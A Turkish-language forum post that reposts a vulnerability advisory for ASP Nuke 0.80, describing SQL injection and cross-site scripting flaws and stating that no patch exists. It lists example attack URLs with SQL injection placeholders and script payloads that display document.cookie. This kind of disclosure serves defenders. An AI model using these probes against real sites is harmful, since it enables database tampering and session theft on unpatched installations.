Hayata Dair Herşey
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
AnasayfaForum KingLatest imagesAramaKayıt OlGiriş yap

 

 ASP Nuke Giriş Onaylama Güvenlik Açıkları

Aşağa gitmek 
YazarMesaj
CalvinKlein
Administrator
Administrator
CalvinKlein


Erkek
Mesaj Sayısı : 1355
Yaş : 29
Nerden : Nişantaşı
Rep :
ASP Nuke Giriş Onaylama Güvenlik Açıkları Left_bar_bleue10 / 10010 / 100ASP Nuke Giriş Onaylama Güvenlik Açıkları Right_bar_bleue

Ruh Hali : ASP Nuke Giriş Onaylama Güvenlik Açıkları Cilgin10
Takım : ASP Nuke Giriş Onaylama Güvenlik Açıkları 1447
Kayıt tarihi : 06/04/08

Kişi sayfası
Oyunlar: Need for Speed

ASP Nuke Giriş Onaylama Güvenlik Açıkları Empty
MesajKonu: ASP Nuke Giriş Onaylama Güvenlik Açıkları   ASP Nuke Giriş Onaylama Güvenlik Açıkları I_icon_minitimePerş. Haz. 05, 2008 3:13 am

Konu: ASPNuke
Etkisi: Uzaktan SQL komutları çalıştırma
Etkilenen sürüm: 0.80
ASP Nuke yazılımında SQL Injection ve XSS (cross-site scripting) açıkları tespit edildi. profile.asp ve select.asp script'leri kullanıcının girdiği HTML kodlarını düzgün olarak filtrelemiyor. Bu açık sayesinde uzaktaki bir kullanıcı SQL komutları çalıştırabiliyor ve cross-site scripting saldırısı gerçekleştirebiliyor.
ör:
http://[target]/module/support/task/comments.asp?taskid='SQL_INJECTION
http://[target] /module/support/task/detail.asp?taskid='SQL_INJECTION
http://[target]/module/article/article/article.asp?articleid='SQL_INJECTION
http://[target]/module/discuss/forum/profile.asp?topicid=1&thradid=346&username='%22%3E %3Cs cript%3Ealert(document·cookie)%3C/script%3E
http://[target]/module/support/language/select.asp?code='%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E


Çözüm:

Henüz bir yama yada yeni sürüm çıkmadı
Sayfa başına dön Aşağa gitmek
https://forumking.all-up.com
 
ASP Nuke Giriş Onaylama Güvenlik Açıkları
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» E-posta Onaylama

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Hayata Dair Herşey :: Bilgisayar & İnternet :: Güvenlik :: Güvenlik ve Güvenlik Açıkları-
Buraya geçin: